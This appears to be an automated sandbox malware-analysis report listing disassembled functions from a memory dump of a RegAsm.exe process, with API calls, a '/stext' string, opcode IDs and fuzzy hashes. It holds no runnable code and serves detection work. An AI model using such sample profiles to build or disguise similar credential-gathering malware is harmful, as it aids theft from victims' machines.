                                                                                                                                                                                Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                • String ID: BINARY
                                                                                                                                                                                • API String ID: 2221118986-907554435
                                                                                                                                                                                • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                                                • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                                                                • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                                                • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                                                                Function 00405220 Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                • _mbscpy.MSVCRT(0045E298,00000000,00000155,?,00405340,?,00000000,004055B5,?,00000000,00405522,?,?,?,00000000,00000000), ref: 00405250
                                                                                                                                                                                • _mbscat.MSVCRT ref: 0040525B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LibraryLoad$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 568699880-0
                                                                                                                                                                                • Opcode ID: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                                                                                                                • Instruction ID: 606e4c6bb64acde45ccb9f726b040251bc13cbada001f714d968da5dd22dddd0
                                                                                                                                                                                • Opcode Fuzzy Hash: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                                                                                                                • Instruction Fuzzy Hash: 52212171A80F00DADA10BF769C4BB1F2694DF50715B10046FB158FA2D2EBBC95419A9D
                                                                                                                                                                                Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _wcsicmp
                                                                                                                                                                                • String ID: /stext
                                                                                                                                                                                • API String ID: 2081463915-3817206916
                                                                                                                                                                                • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                                                                • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                                                                Function 00409529 Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040957A
                                                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$??2@CloseCreateHandleReadSize
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1023896661-0
                                                                                                                                                                                • Opcode ID: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                                                                                                                                • Instruction ID: f35f9952f6e959c636c436af82c7d55a8b84e599ec35ab47be9645748316c481
                                                                                                                                                                                • Opcode Fuzzy Hash: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                                                                                                                                • Instruction Fuzzy Hash: 0D11D671A00608BFCB129F2ACC8585F7BA5EF94350B14843FF415AB392DB75DE40CA58
                                                                                                                                                                                Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                                                                                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2445788494-0
                                                                                                                                                                                • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                                                                                • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                                                                • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                                                                                • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                                                                Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcmpmemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1065087418-0
                                                                                                                                                                                • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                                                                • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                                                                Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00410654
                                                                                                                                                                                  • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                  • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                                                                  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                  • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1381354015-0
                                                                                                                                                                                • Opcode ID: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                                                                                                                                                                                • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                                                • Opcode Fuzzy Hash: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                                                                                                                                                                                • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                                                Function 004136C0 Relevance: 1.7, APIs: 1, Instructions: 163COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                                                                                                                • Instruction ID: 68238382b965d6cf35967491492c160b6f6d54887ef21f0023ff885919cfaa00
                                                                                                                                                                                • Opcode Fuzzy Hash: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                                                                                                                • Instruction Fuzzy Hash: 695126B5A00209AFCB14DFD4C884CEFBBB9FF88705B14C559F512AB254E735AA46CB60
                                                                                                                                                                                Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                                  • Part of subcall function 0040A02C: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                  • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                  • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                                                                                • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2154303073-0
                                                                                                                                                                                • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                                                • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                                                • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                                                Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$PointerRead
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3154509469-0
                                                                                                                                                                                • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                                                • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                                                Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                                  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                                  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                                  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4232544981-0
                                                                                                                                                                                • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                                                • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                                                Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                                • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                                                • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                                                Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileModuleName
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 514040917-0
                                                                                                                                                                                • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                                                • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                                                Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                                                • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                                                Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • WriteFile.KERNEL32(?,00000009,?,00000000,00000000), ref: 0040A325
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileWrite
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                                                • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                                                • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                                                Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                                • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                                                • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                                                Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                                                • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                                                Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                                                • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                                                Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                                                • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                                                • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                                                Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • FreeLibrary.KERNEL32(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                                • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
